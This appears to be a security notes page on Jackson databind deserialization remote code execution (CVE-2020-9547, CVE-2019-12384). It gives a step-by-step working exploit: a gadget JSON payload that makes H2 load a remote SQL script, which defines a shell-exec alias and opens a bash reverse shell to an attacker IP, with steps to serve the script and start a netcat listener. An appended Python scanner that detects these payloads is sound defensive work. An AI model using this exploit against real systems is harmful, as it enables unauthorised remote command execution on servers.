Serialization

Linux

CVE-2020-9547: FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).
GitHub - jas502n/CVE-2019-12384: Jackson Rce For CVE-2019-12384
1. Payload:
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPTFROM'http://10.10.xx.xx:443/sql.sql'"}]

2. Create file sql.sql with the target command
CREATE ALIAS SHELLEXEC AS $ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A");
return s.hasNext() ? s.next() : ""; }
$;
CALL SHELLEXEC('bash -i &>/dev/tcp/10.10.xxx.xxx/4444 0>&1 &')

3. python -m SimpleHTTPServer 443

4. nc -lvp 4444
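
For detection, the following added example (not from this page or the linked repository) scans JSON request bodies for the two markers in step 1: a `["class.Name", {...}]` polymorphic type wrapper and an H2 JDBC URL carrying an `INIT=` script. It generalizes beyond the page by also flagging any fully qualified class name in that position. The function names and the samples are assumptions made for illustration.

```python
import json
import re

# Gadget classes named on this page; a real deployment would load a longer list.
GADGET_CLASSES = {
    "ch.qos.logback.core.db.DriverManagerConnectionSource",
    "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
}
FQCN = re.compile(r"^(?:[a-z_][\w$]*\.)+[A-Za-z_$][\w$]*$")
H2_INIT = re.compile(r"^jdbc:h2:.*;\s*INIT\s*=", re.I | re.S)
# Constructed samples; the first is the payload string as printed on this page.
SAMPLES = {
    "page_payload": '''["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPTFROM'http://10.10.xx.xx:443/sql.sql'"}]''',
    "nested_unknown": '{"item":["org.example.Widget",{"size":1}]}',
    "benign": '{"user":"alice","tags":["a",{"k":1}],"db":"jdbc:h2:mem:test"}',
}


def type_id_reason(name):
    if name in GADGET_CLASSES:
        return "known gadget class " + name
    if FQCN.match(name):
        return "polymorphic type id " + name
    return None


def scan(node, path="$"):
    """Yield (json_path, reason) for each suspicious construct in parsed JSON."""
    if isinstance(node, list):
        # WRAPPER_ARRAY form of default typing: ["pkg.Class", {properties}]
        if len(node) == 2 and isinstance(node[0], str) and isinstance(node[1], dict):
            reason = type_id_reason(node[0])
            if reason:
                yield path, reason
        for i, item in enumerate(node):
            yield from scan(item, f"{path}[{i}]")
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from scan(value, f"{path}.{key}")
    elif isinstance(node, str) and H2_INIT.match(node):
        yield path, "H2 JDBC URL with INIT script"


def inspect_body(raw):
    """Return findings for one request body; invalid JSON is reported, not ignored."""
    try:
        return list(scan(json.loads(raw)))
    except ValueError:
        return [("$", "body is not valid JSON")]
```

The generic type-id rule will also fire on applications that legitimately exchange polymorphic JSON, so treat it as a lower-severity signal than a match against the gadget list or the H2 `INIT=` URL.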